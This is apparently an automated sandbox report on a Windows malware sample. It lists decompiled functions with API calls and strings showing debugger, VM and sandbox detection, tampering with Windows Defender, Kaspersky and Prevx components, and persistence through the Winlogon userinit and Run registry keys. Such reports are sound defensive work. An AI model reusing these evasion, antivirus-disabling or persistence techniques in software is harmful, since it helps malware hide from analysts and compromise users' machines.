Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
Part of subcall function 00403920: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C

ExitProcess.KERNEL32 ref: 00402BAB
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
GetTickCount.KERNEL32 ref: 00402BCE
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
IsUserAnAdmin.SHELL32 ref: 00402C00
ExitProcess.KERNEL32 ref: 00402C11

Strings

\apppatch\, xrefs: 00402C5A, 00402CAA
Pnv, xrefs: 00402D2D, 00402D8F
Tue Aug 2 12:53:17 20112, xrefs: 00402CCB, 00402CDF, 00402D02, 00402D12, 00402D64, 00402D74
____AVP.Root, xrefs: 00402BBD
explorer.exe, xrefs: 00402D3E, 00402D43, 00402DA0, 00402DA5
user32.dll, xrefs: 00402B81
winlogon.exe, xrefs: 00402D37, 00402D99
kernel32.dll, xrefs: 00402C19
IsWow64Process, xrefs: 00402C31

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 9317432-1956477594
Opcode ID: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
Opcode Fuzzy Hash: 284e66e4bbf4f984f0241835b871c3ec669658df2c17cadb1783e4bd5444081f
Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

Function 004028B0 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C,755CDB30,00000000,00000000), ref: 004028EB
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
PathFileExistsA.KERNELBASE(?), ref: 00402924
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
GetCurrentProcess.KERNEL32(?), ref: 0040299E
GetTickCount.KERNEL32 ref: 004029D6

Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

_snprintf.MSVCRT ref: 00402A50
CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
HeapValidate.KERNEL32(00000000), ref: 00402AC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
HeapFree.KERNEL32(00000000), ref: 00402AD7
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
GetCurrentProcess.KERNEL32(?), ref: 00402B26
GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
ExitProcess.KERNEL32 ref: 00402B55
GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60

Strings

Tue Aug 2 12:53:17 20111, xrefs: 00402B3F, 00402B5B
\apppatch\, xrefs: 0040294F
svchost.exe, xrefs: 004029BA
kernel32.dll, xrefs: 00402971, 00402AFC
IsWow64Process, xrefs: 00402987, 00402B0F
.exe, xrefs: 00402A28
%s_, xrefs: 00402A3E

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-1703505012
Opcode ID: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
Opcode Fuzzy Hash: 8c19fc42e0cf0d5ec2b52a9f48d22261c74e53a708defb603739ef645998fcf7
Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99

Function 00403920 Relevance: 42.1, APIs: 15, Strings: 9, Instructions: 128
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
strstr.MSVCRT ref: 00403967

Part of subcall function 00403870: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
Part of subcall function 00403870: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
Part of subcall function 00403870: RegCloseKey.KERNELBASE(y9@), ref: 004038CF

GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
CharUpperA.USER32(?), ref: 00403999
strstr.MSVCRT ref: 004039AB
strstr.MSVCRT ref: 004039C4
strstr.MSVCRT ref: 004039DD
strstr.MSVCRT ref: 004039F6
strstr.MSVCRT ref: 00403A0F
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE

Strings

\sandbox\, xrefs: 00403AB2
SANDBOX, xrefs: 004039A5
Dave, xrefs: 00403A09
\cwsandbox\, xrefs: 00403AA0
test_item.exe, xrefs: 00403961
test user, xrefs: 004039F0
\sand-box\, xrefs: 00403A8E
MALNETVM, xrefs: 004039BE
VIRUSCLONE, xrefs: 004039D7

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
API String ID: 3012634381-649399103
Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

Function 004021B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
CloseHandle.KERNEL32(00000000), ref: 0040232A

Strings

", xrefs: 00402287
m, xrefs: 004022CD
e, xrefs: 0040226B
S, xrefs: 00402295
t, xrefs: 004022D4
g, xrefs: 00402279
4, xrefs: 004022B8
0, xrefs: 004022BF
s, xrefs: 00402272
D, xrefs: 004022B1
\\.\KmxAgent, xrefs: 004021C8
", xrefs: 0040225A
E, xrefs: 0040229C
T, xrefs: 004022AA
m, xrefs: 004022E2
d, xrefs: 00402253
E, xrefs: 004022A3
t, xrefs: 004022E9

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

Function 00401000 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401014
FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
memset.MSVCRT ref: 0040104B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Process32First.KERNEL32 ref: 00401071
StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
Process32Next.KERNEL32(00000000,?), ref: 0040109D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

Strings

OLLYDBG, xrefs: 00401025
idag.exe, xrefs: 004010E3
vmwaretray.exe, xrefs: 004010F1
\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 004010FF
wireshark.exe, xrefs: 00401083
dumpcap.exe, xrefs: 004010D5

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 1862551656-1290435522
Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA

Function 00403870 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 48
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
RegCloseKey.KERNELBASE(y9@), ref: 004038CF
RegCloseKey.ADVAPI32(y9@), ref: 004038DF

Strings

y9@, xrefs: 00403879, 004038DB, 004038CB, 0040387C, 004038CE, 004038DE
HARDWARE\DESCRIPTION\System, xrefs: 00403884
Q, xrefs: 004038E5
SystemBiosVersion, xrefs: 004038B7
U, xrefs: 00403900
M, xrefs: 004038F7
E, xrefs: 004038EE

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue
String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
API String ID: 1607946009-2685269968
Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D

Function 00402660 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228
commemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
SysAllocString.OLEAUT32(?), ref: 004026C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
SysFreeString.OLEAUT32(00000000), ref: 00402844
CoUninitialize.OLE32 ref: 0040289E

Strings

Windows Explorer, xrefs: 004026CD

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54

Function 004020C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004020FE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
SetCurrentDirectoryA.KERNELBASE(?), ref: 00402137
LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402146
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
FreeLibrary.KERNELBASE(00000000), ref: 0040218C

Strings

MpClient.dll, xrefs: 00402141
Windows Defender, xrefs: 0040211E
WDEnable, xrefs: 00402155

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$WDEnable$Windows Defender
API String ID: 1010965793-3061216624
Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8

Function 00401DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004013C0: CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004013E7
Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401403
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401423
Part of subcall function 004013C0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 0040142A
Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
Part of subcall function 004013C0: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
Part of subcall function 004013C0: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4

RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
GetTickCount.KERNEL32 ref: 00401E23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
HeapValidate.KERNEL32(00000000), ref: 00401E81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
HeapFree.KERNEL32(00000000), ref: 00401E91

Strings

RtlUniform, xrefs: 00401E3E
ntdll.dll, xrefs: 00401E2F

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 3168189189-3277137149
Opcode ID: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
Opcode Fuzzy Hash: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8

Function 00402340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
CloseHandle.KERNEL32(00000000), ref: 0040241D

Strings

\\.\pipe\acsipc_server, xrefs: 00402365

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 00401130 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401152
memset.MSVCRT ref: 00401171
IsUserAnAdmin.SHELL32 ref: 0040118A
RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
_snprintf.MSVCRT ref: 0040120E
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,755CDB30), ref: 00401275
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8

Strings

userinit, xrefs: 004012AA
SystemDrive, xrefs: 004011CA
software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6
software\microsoft\windows\currentversion\run, xrefs: 0040128A

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 1223198359-2324515132
Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

Function 00402520 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
CloseHandle.KERNEL32(00000000), ref: 00402647

Strings

\PrevxCSI\csidb.csi, xrefs: 0040255A

Memory Dump Source

Source File: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2033223674.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_roundwood.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9

Function 004013C0 Relevance: 24.1, APIs: 16, Instructions: 133
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004013E7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401403
GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401423
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 0040142A
memset.MSVCRT ref: 0040143D
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
HeapValidate.KERNEL32(00000000), ref: 004014A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
HeapFree.KERNEL32(00000000), ref: 004014B4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004014D4
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004014E5
